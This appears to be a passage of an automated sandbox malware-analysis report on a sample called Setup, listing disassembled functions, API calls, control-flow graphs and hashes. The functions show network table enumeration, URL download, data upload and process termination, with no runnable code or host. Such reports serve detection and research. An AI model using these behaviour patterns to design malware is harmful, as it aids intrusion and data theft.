                                                                                                                                                                                                                                                        • Part of subcall function 031D258E: GetLastError.KERNEL32(?,?,031DA896,?,00000000,?,?,031DAB37,?,00000007,?,?,031DB0EC,?,?), ref: 031D25AF
                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,031D5105,00000000,00000000,00000000), ref: 031D4FC4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3335090040-0
                                                                                                                                                                                                                                                      • Opcode ID: cc735c8f0652ba64915fecd26b18ed4eb8d6ca3c78f233963f906bcab1836015
                                                                                                                                                                                                                                                      • Instruction ID: c8f87b5cbb9a5811319f56f941b74df48972dd6b4b60ba51015d0c52e8f1a7f9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc735c8f0652ba64915fecd26b18ed4eb8d6ca3c78f233963f906bcab1836015
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67412775900320AFCB10FFBAED0998EBB79EF0F614B144255E415AB191EF309A45CBD1
                                                                                                                                                                                                                                                      Function 03199F30 Relevance: 1.6, APIs: 1, Instructions: 131nativeCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?,?,?,?,?,?,?,?,031F6BE8,00000002), ref: 0319A08C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharConcurrency::cancel_current_taskInformationMultiQuerySystemWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2924814847-0
                                                                                                                                                                                                                                                      • Opcode ID: 43a9538b96772eb0d835c81febb4a184c98b48f3bfa6625e8f68efc31bf0a42f
                                                                                                                                                                                                                                                      • Instruction ID: c0f81e9336b6537108540115f69fd6959cc92373eba3d70219d4afd29ab7a3df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43a9538b96772eb0d835c81febb4a184c98b48f3bfa6625e8f68efc31bf0a42f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3651AE70E04349DFEB10EFA4C9057AEBBB4EF49708F108259E405AF281DBB55A88CF91
                                                                                                                                                                                                                                                      Function 03199D60 Relevance: 1.6, APIs: 1, Instructions: 128nativeCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?,?,?,?,?,?,?,?,031F6BD8,00000002), ref: 03199EA4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharConcurrency::cancel_current_taskInformationMultiQuerySystemWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2924814847-0
                                                                                                                                                                                                                                                      • Opcode ID: 260d0b316e0a0cf1ccd07f71f52da45728ceb1d8810f089d0a0361ae39e819e0
                                                                                                                                                                                                                                                      • Instruction ID: 109700fc9e17e099be8be821d9cee0bb9e3926207e7e5b758c9c2eff720a9d11
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 260d0b316e0a0cf1ccd07f71f52da45728ceb1d8810f089d0a0361ae39e819e0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C518C70E04318DFDB00EFA8C955BEEBBB4EF49708F20424AE4017B281DBB55A458B95
                                                                                                                                                                                                                                                      Function 031756C0 Relevance: .4, Instructions: 400COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 40f362a4ff931983ba752bd7684d7a6a8bdaf437c3da7be8dc3e1baea3ee5410
                                                                                                                                                                                                                                                      • Instruction ID: 456694bc1dc0a02aa7b8a7ee2b56e7b06101f6be5ee1d3d33197c19e359fc956
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40f362a4ff931983ba752bd7684d7a6a8bdaf437c3da7be8dc3e1baea3ee5410
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AF15AB5608B408FD724CF29C85076BB7F6BF89314F084A2DE5AA87790E774E944CB52
                                                                                                                                                                                                                                                      Function 031A56C0 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 6d76a2c0381c9f2fd4c12d8b5106f739798fd8618170caca11cfb99e7bcb62d3
                                                                                                                                                                                                                                                      • Instruction ID: b39dcef722ca647b59eb048ae73288b0be7d28eb3e55902525d7102e1259013e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d76a2c0381c9f2fd4c12d8b5106f739798fd8618170caca11cfb99e7bcb62d3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAA1BE78D08699DFDB05CFA8D8547EEFBB2AF5E215F084199D8A0AB342D3309545CBA0
                                                                                                                                                                                                                                                      Function 0317A8D0 Relevance: 24.3, APIs: 16, Instructions: 322memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 0 317a8d0-317a90d call 31799d0 2 317a912-317a92a VirtualAlloc 0->2 3 317a92c-317a941 2->3 4 317a96b-317a9a3 GetExtendedTcpTable VirtualAlloc 2->4 11 317a943-317a957 3->11 12 317a95d-317a965 VirtualFree 3->12 5 317a9a5-317a9c8 call 31bfc10 GetExtendedTcpTable 4->5 6 317aa03-317aa0e call 3179c20 4->6 16 317a9eb-317a9fd VirtualFree 5->16 17 317a9ca-317a9ce 5->17 14 317aa14-317aa1f call 317a250 6->14 15 317acde-317ad0a call 318b460 6->15 11->12 12->4 24 317acd6-317acd9 call 31799d0 14->24 25 317aa25-317aa35 StrStrA 14->25 26 317ad11-317ad2d call 31a742b 15->26 16->2 16->6 17->16 20 317a9d0 17->20 23 317a9d3-317a9d8 20->23 27 317a9e4 23->27 28 317a9da-317a9e0 23->28 24->15 30 317acc4-317acd0 GetProcessHeap HeapFree 25->30 31 317aa3b-317aa4c StrStrA 25->31 27->16 28->23 33 317a9e2 28->33 30->24 31->30 34 317aa52-317aa66 StrStrA 31->34 33->16 34->30 36 317aa6c-317aa97 MultiByteToWideChar VirtualAlloc 34->36 36->30 37 317aa9d-317aac4 call 31bfc10 MultiByteToWideChar 36->37 40 317aac6-317aace VirtualFree 37->40 41 317aad4-317aad6 call 317a3e0 37->41 40->41 43 317aadb-317aae0 41->43 44 317acb6-317acbe VirtualFree 43->44 45 317aae6-317ab6d call 3189c80 call 31799d0 call 318b460 call 3184b60 call 3189e20 43->45 44->30 56 317ab73-317abfa call 318b460 call 3184b60 call 318b460 call 3184b60 call 3184c20 45->56 57 317abfc-317ac27 call 318b460 45->57 62 317ac2c-317ac76 56->62 57->62 64 317ac89-317ac92 62->64 65 317ac78-317ac86 call 3187ff0 62->65 68 317ac94-317ac9d call 3187ff0 64->68 69 317aca2-317acb4 call 31889a0 64->69 65->64 68->69 69->26
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004,03205040,00000000,00000010,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8), ref: 0317A920
                                                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317A965
                                                                                                                                                                                                                                                      • GetExtendedTcpTable.IPHLPAPI(00000000,?,00000000,00000002,00000000,00000000), ref: 0317A987
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC), ref: 0317A999
                                                                                                                                                                                                                                                      • GetExtendedTcpTable.IPHLPAPI(00000000,00000000,00000000,00000002,00000000,00000000), ref: 0317A9C0
                                                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?), ref: 0317A9F3
                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,031F7934,00000010,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317AA2B
                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(-00000019,031F7950,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317AA44
                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(-00000019,031F7954,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317AA5B
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?), ref: 0317AA7A
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC), ref: 0317AA8D
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,?,?,?,031F7A1C,?,03203654,031F7A00,?), ref: 0317AABB
                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?), ref: 0317AACE
                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,?,?,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8), ref: 0317ACBE
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,031F79CC,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317ACC9
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317ACD0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Virtual$Free$Alloc$ByteCharExtendedHeapMultiTableWide$Process
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1791798720-0
                                                                                                                                                                                                                                                      • Opcode ID: fa331207025208597dd4fdb7b7cce537faf972658c2c35c1e683d7af8d0ebf00
                                                                                                                                                                                                                                                      • Instruction ID: edd1fb3e2420fce50d674145aff43bad09dc0622774c1d2c0228a7e8777f90a3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa331207025208597dd4fdb7b7cce537faf972658c2c35c1e683d7af8d0ebf00
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABC1B174E40304ABEB10EFA4CD05BADBBB4AF4D704F284249E5117F2C1DBB59684CBA5
                                                                                                                                                                                                                                                      Function 0319F4C0 Relevance: 11.1, APIs: 2, Strings: 4, Instructions: 589threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 267 319f4c0-319f561 call 319f2b0 call 319d0a0 call 3185e80 call 3185fe0 call 3182a10 call 3178bf0 call 3189740 282 319f7a0-319f7c0 call 3185fe0 call 3189740 267->282 283 319f567-319f63b call 319e180 call 319deb0 call 319ef30 call 31a0070 call 31a00c0 call 319f330 call 31a56c0 call 319b6b0 call 319d0a0 call 3185e80 * 3 call 318a790 267->283 293 319f89b-319f9e7 call 31a56c0 call 3186050 call 31a59a0 call 31847d0 call 3189ee0 call 319fd80 call 3189890 * 3 call 3185030 call 3189890 call 3185030 call 319b570 FindWindowA call 319a5a0 call 3185030 call 31a5150 282->293 294 319f7c6-319f881 call 319e180 call 318a220 call 318a690 call 319deb0 call 3185e80 * 2 call 319ef30 call 31a0070 call 31a00c0 call 319d0a0 call 3185e80 call 3185380 282->294 359 319f788-319f79b call 3185e80 call 3185380 283->359 360 319f641-319f780 call 3185fe0 call 319deb0 call 31a0080 call 3185380 call 3185e80 call 319ef30 call 31a0070 call 31a00c0 call 319d0a0 call 3185e80 call 319f330 call 31a56c0 call 319b6b0 call 319d0a0 call 3185e80 * 4 call 3185380 call 3189740 283->360 390 319fbba-319fbf3 call 3185030 call 31a5150 293->390 391 319f9ed-319fa37 call 3189890 call 3185030 call 31a5150 293->391 366 319f886-319f895 call 3189740 294->366 359->282 360->283 491 319f786 360->491 366->293 366->294 406 319fbf9-319fc3e call 3189890 call 3185030 call 31a5150 390->406 407 319fd05-319fd39 call 3185030 call 31a5150 390->407 391->390 414 319fa3d-319fba6 call 319ff90 call 3189890 * 5 call 3185030 call 3189890 call 3185030 call 3189890 call 3185030 call 3189890 call 3185030 call 3189890 call 3185030 call 3189890 call 3185030 call 3189890 call 3185030 call 3183800 call 3182b60 391->414 406->407 435 319fc44-319fd00 call 31a0060 call 3189890 * 3 call 3185030 call 3189890 call 3185030 call 3189890 call 3185030 call 31a3370 call 31a2f50 call 319ffb0 406->435 425 319fd68-319fd70 RtlExitUserThread 407->425 426 319fd3b-319fd63 call 3189890 call 3185030 call 319e440 407->426 517 319fbab-319fbb5 call 319fe70 414->517 426->425 435->407 491->282 517->390
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0319F2B0: __Xtime_get_ticks.LIBCPMT ref: 0319F2E2
                                                                                                                                                                                                                                                        • Part of subcall function 0319F2B0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0319F2F0
                                                                                                                                                                                                                                                      • FindWindowA.USER32(031F71B0,031F6626), ref: 0319F996
                                                                                                                                                                                                                                                        • Part of subcall function 0319DEB0: InternetOpenUrlA.WININET ref: 0319E086
                                                                                                                                                                                                                                                        • Part of subcall function 0319DEB0: InternetReadFile.WININET ref: 0319E0EA
                                                                                                                                                                                                                                                        • Part of subcall function 0319DEB0: InternetReadFile.WININET ref: 0319E136
                                                                                                                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 0319FD6A
                                                                                                                                                                                                                                                        • Part of subcall function 03185030: Concurrency::cancel_current_task.LIBCPMT ref: 0318534B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Internet$FileRead$Concurrency::cancel_current_taskExitFindOpenThreadUnothrow_t@std@@@UserWindowXtime_get_ticks__ehfuncinfo$??2@
                                                                                                                                                                                                                                                      • String ID: .$1735337711$https://$https://
                                                                                                                                                                                                                                                      • API String ID: 1741030633-881400878
                                                                                                                                                                                                                                                      • Opcode ID: 8f6cb2db7a8d90c93dc6b5e3ef0dc0ae96e19ba84fd917cf4f3fe9c686fb3d90
                                                                                                                                                                                                                                                      • Instruction ID: 3e90ce91addc23d605700f6d0dcf7631ef5ab12fa2da22658353fc32d8676d1b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f6cb2db7a8d90c93dc6b5e3ef0dc0ae96e19ba84fd917cf4f3fe9c686fb3d90
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF327834901348AFEF15FBA8C955BEEBBB5AF1E300F5440D9D4056B282DB741B09CBA6
                                                                                                                                                                                                                                                      Function 03179500 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 254filenetworkCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 519 3179500-3179613 call 31792c0 528 3179850-3179862 call 3187ff0 519->528 529 3179619-3179626 519->529 535 3179864-317987f call 31a742b 528->535 531 317962a-317964d 529->531 532 3179628 529->532 531->528 539 3179653-317966f 531->539 532->531 539->528 542 3179675-31796d1 539->542 542->528 545 31796d7-31796d9 542->545 546 3179707-317970c 545->546 547 31796db 545->547 548 3179711-3179723 InternetWriteFile 546->548 549 31796e1-31796f3 InternetWriteFile 547->549 548->528 551 3179729-3179735 548->551 549->528 550 31796f9-3179705 549->550 550->546 550->549 551->548 552 3179737-3179753 551->552 552->528 555 3179759-3179786 552->555 558 31797e9-3179838 555->558 559 3179788 555->559 558->528 572 317983a-317984e call 3187ff0 558->572 560 3179790-3179798 559->560 560->558 561 317979a-317979f 560->561 563 31797a5-31797e7 OutputDebugStringA 561->563 564 3179882-3179887 call 31a755c 561->564 563->558 563->560 572->535
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InternetWriteFile.WININET(00000000,?,?,?), ref: 031796EB
                                                                                                                                                                                                                                                      • InternetWriteFile.WININET(00000000,--------,0000000C,?), ref: 0317971B
                                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(00000000,?,03205040,00000003,?), ref: 031797B4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileInternetWrite$DebugOutputString
                                                                                                                                                                                                                                                      • String ID: --------$($/?#
                                                                                                                                                                                                                                                      • API String ID: 2994765058-4100224915
                                                                                                                                                                                                                                                      • Opcode ID: 5e048834029fb243f8f9b959fb76302ff80340f524b4fd7c1c396db3db5e6f7d
                                                                                                                                                                                                                                                      • Instruction ID: 2ecdca7937d912034f539970886ab3504313b826b53512855eaf23ff07c842ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e048834029fb243f8f9b959fb76302ff80340f524b4fd7c1c396db3db5e6f7d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43A195B1A002199FDB24DF54DC44FA9B7B9EF4C700F1441A5EA09A7281DB71AE85CFA8
                                                                                                                                                                                                                                                      Function 031C3472 Relevance: 9.3, APIs: 6, Instructions: 270COMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 961 31c3472-31c3480 962 31c3495-31c34a5 961->962 963 31c3482-31c3493 call 31c4593 call 31cc0a9 961->963 964 31c34ba-31c34c0 962->964 965 31c34a7-31c34b8 call 31c4593 call 31cc0a9 962->965 983 31c34e8-31c34ea 963->983 969 31c34c8-31c34ce 964->969 970 31c34c2 964->970 988 31c34e7 965->988 975 31c34eb call 31d5164 969->975 976 31c34d0 969->976 973 31c34da-31c34e4 call 31c4593 970->973 974 31c34c4-31c34c6 970->974 986 31c34e6 973->986 974->969 974->973 984 31c34f0-31c3505 call 31d4613 975->984 976->973 981 31c34d2-31c34d8 976->981 981->973 981->975 990 31c36f8-31c3709 call 31cc0d6 984->990 991 31c350b-31c3517 call 31d463f 984->991 986->988 988->983 991->990 997 31c351d-31c3529 call 31d466b 991->997 997->990 1000 31c352f-31c3544 997->1000 1001 31c35b4-31c35bf call 31d489a 1000->1001 1002 31c3546 1000->1002 1001->986 1008 31c35c5-31c35d0 1001->1008 1003 31c3548-31c354e 1002->1003 1004 31c3550-31c356c call 31d489a 1002->1004 1003->1001 1003->1004 1004->986 1012 31c3572-31c3575 1004->1012 1010 31c35ec 1008->1010 1011 31c35d2-31c35db call 31d51c1 1008->1011 1014 31c35ef-31c3603 call 31e2130 1010->1014 1011->1010 1020 31c35dd-31c35ea 1011->1020 1015 31c357b-31c3584 call 31d51c1 1012->1015 1016 31c36f1-31c36f3 1012->1016 1023 31c3605-31c360d 1014->1023 1024 31c3610-31c3637 call 31e2080 call 31e2130 1014->1024 1015->1016 1025 31c358a-31c35a2 call 31d489a 1015->1025 1016->986 1020->1014 1023->1024 1033 31c3639-31c3642 1024->1033 1034 31c3645-31c366c call 31e2080 call 31e2130 1024->1034 1025->986 1030 31c35a8-31c35af 1025->1030 1030->1016 1033->1034 1039 31c366e-31c3677 1034->1039 1040 31c367a-31c3689 call 31e2080 1034->1040 1039->1040 1043 31c368b 1040->1043 1044 31c36b1-31c36d1 1040->1044 1047 31c368d-31c368f 1043->1047 1048 31c3691-31c36a5 1043->1048 1045 31c36ee 1044->1045 1046 31c36d3-31c36ec 1044->1046 1045->1016 1046->1016 1047->1048 1049 31c36a7-31c36a9 1047->1049 1048->1016 1049->1016 1050 31c36ab 1049->1050 1050->1044 1051 31c36ad-31c36af 1050->1051 1051->1016 1051->1044
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 031C35FA
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031C3616
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 031C362D
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031C364B
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 031C3662
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031C3680
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                                                                                                                      • Opcode ID: 5ed403bdb2a50c1951712f0982c6f736e4f74098a96fc3379f0e513d39c29211
                                                                                                                                                                                                                                                      • Instruction ID: 77c456128cbb58f0564e5bdf6d379d848c54941638bc8b020494483dada943f5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ed403bdb2a50c1951712f0982c6f736e4f74098a96fc3379f0e513d39c29211
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37814D79610B929BD725DF29CC41B5AB3E9AF5D360F14C92DE021DB3C0EB78D6018790
                                                                                                                                                                                                                                                      Function 031A5563 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1052 31a5563-31a5590 1053 31a5593-31a559c 1052->1053 1053->1053 1054 31a559e-31a55c0 call 318af50 1053->1054 1057 31a55c2 1054->1057 1058 31a55c4-31a55e0 1054->1058 1057->1058 1059 31a560a 1058->1059 1060 31a55e2-31a55e4 1058->1060 1063 31a5611-31a5639 call 3187f30 * 2 1059->1063 1061 31a5601-31a5608 1060->1061 1062 31a55e6-31a55e8 1060->1062 1061->1063 1064 31a55f0-31a55f7 1062->1064 1070 31a563b-31a564f OpenProcess 1063->1070 1071 31a5661-31a567c Process32NextW 1063->1071 1064->1059 1066 31a55f9-31a55ff 1064->1066 1066->1061 1066->1064 1070->1071 1072 31a5651-31a565b TerminateProcess CloseHandle 1070->1072 1073 31a5682-31a56ab CloseHandle Sleep call 31a742b 1071->1073 1074 31a5556-31a555e call 31a4e60 1071->1074 1072->1071 1077 31a56b0-31a56b3 1073->1077 1074->1052
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?,?,?), ref: 031A5645
                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 031A5654
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 031A565B
                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(?,?), ref: 031A566E
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 031A5688
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 031A5693
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseHandleProcess$NextOpenProcess32SleepTerminate
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2662874868-0
                                                                                                                                                                                                                                                      • Opcode ID: ea86d6f385460b3bffa23b069cc9d258a06a38879ab175af47c98446447b1bd7
                                                                                                                                                                                                                                                      • Instruction ID: e3121e9a12fa3a369ac13d69a8c1f71aa5124cc69da995e3da2ccdb91ffbb846
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea86d6f385460b3bffa23b069cc9d258a06a38879ab175af47c98446447b1bd7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E317E39804668DBDB24EB68CC48BEEB7B6FF49305F1842D9D84967180DB751B84CF90
                                                                                                                                                                                                                                                      Function 02DC25A5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
